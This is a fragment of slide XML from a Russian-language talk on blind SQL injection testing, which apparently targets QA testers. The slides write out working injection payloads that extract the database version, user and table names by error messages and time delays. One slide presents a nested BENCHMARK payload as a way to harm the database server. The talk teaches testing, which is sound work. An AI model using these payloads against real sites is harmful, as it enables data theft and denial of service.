            <a:endParaRPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Subtitle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5638800"/>
            <a:ext cx="7772400" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Игорь Бондаренко</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neklo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Запросы для других баз данных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z="2000" dirty="0" err="1"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>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i="1" dirty="0" smtClean="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>and(1)=cast(version() as numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>)—</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>MSSQL: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i="1" dirty="0" smtClean="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>and(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)=convert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>,@@version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>)—</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Sybase: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i="1" dirty="0" smtClean="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>and(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)=convert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>,@@version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>)—</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Oracle: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i="1" dirty="0" smtClean="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" i="1" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>and(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)=(select upper(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>XMLType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(60)||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(58)||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(58)||(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>replace(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>banner,chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(32),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(58)) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sys.v_$version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>rownum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>=1)||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(62))) from dual)--</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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US" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/16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317592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Тестирование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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Определение версии и типа поддерживаемой БД</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Использование готовых </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>эксплоитов</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t> для определенной БД</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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ru-RU" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0/16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915029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Double Blind Injections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b="1" dirty="0"/>
              <a:t>Вывод информации на экран: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>О</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>тсутствует</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0"/>
              <a:t>Способ обнаружения: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0"/>
              <a:t>Посимвольный </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>перебор с использованием временных задержек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ru-RU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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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ru-RU" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1/16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6865487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Техники эксплуатации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/>
              <a:t>Посимвольный перебор с помощью </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Benchmark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>(lower(substring((SELECT TOP 1 name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>='U'), 1, 1))) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>109</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> , 1, BENCHMARK(2999999,MD5(NOW())))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>Способ навредить серверу БД:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=2’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>BENCHMARK(100000, BENCHMARK(100000,md5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>current_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)))</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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ru-RU" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2/16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5733803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Техники эксплуатации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/>
              <a:t>Посимвольный перебор с помощью </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Benchmark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>=2’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))&gt;=100, 1, BENCHMARK(2999999,MD5(NOW()))) –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>Способ навредить серверу БД:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=2’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>BENCHMARK(100000, BENCHMARK(100000,md5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>current_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)))</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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ru-RU" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3/16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5596559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Тестирование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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>Проверка отсутствия временных задержек при выполнении истинных и ложных запросов</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>Подбор приемлемого времени отклика</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>Проверка со значениями подобранными для существующих пользователей и имен таблиц</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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ru-RU" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4/16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060150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Программы для поиска уязвимостей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sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Blind SQL Injector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Tool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2400" dirty="0" err="1"/>
              <a:t>WebInspect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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ru-RU" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>5/16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5699307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/>
              <a:t>Заключение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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>Проверки слепых инъекций значительно повысят качество ваших тестов</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>Тесты быстрые и простые</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0"/>
              <a:t>Тесты можно не проводить вручную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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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ru-RU" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/16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1290506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Вопросы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914400" y="5485581"/>
            <a:ext cx="7315200" cy="868363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Email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bondarenko.ihar@yandex.ru</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Skype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: igor.bondarenko1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133511"/>
            <a:ext cx="4352070" cy="435207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" y="274638"/>
            <a:ext cx="1524000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013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Архитектура уязвимости</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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326936045"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1660478" y="1217613"/>
          <a:ext cx="5486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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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ru-RU" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/16</a:t>
            </a:r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Условия возникновения уязвимости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2000" dirty="0" smtClean="0"/>
              <a:t>Результат выполнения внедренного запроса не отображается среди данных доступных пользователю</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Внедренный запрос попадает в несколько разных запросов, осуществляющих выборку из таблиц с различным числом столбцов</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Используется </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0"/>
              <a:t>фильтрация склеивания запросов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" y="274638"/>
            <a:ext cx="1524000" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6446428"/>
            <a:ext cx="914400" cy="434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US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/16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905812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Classical Injection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b="1" dirty="0" smtClean="0"/>
              <a:t>Вывод информации на экран: </a:t>
            </a:r>
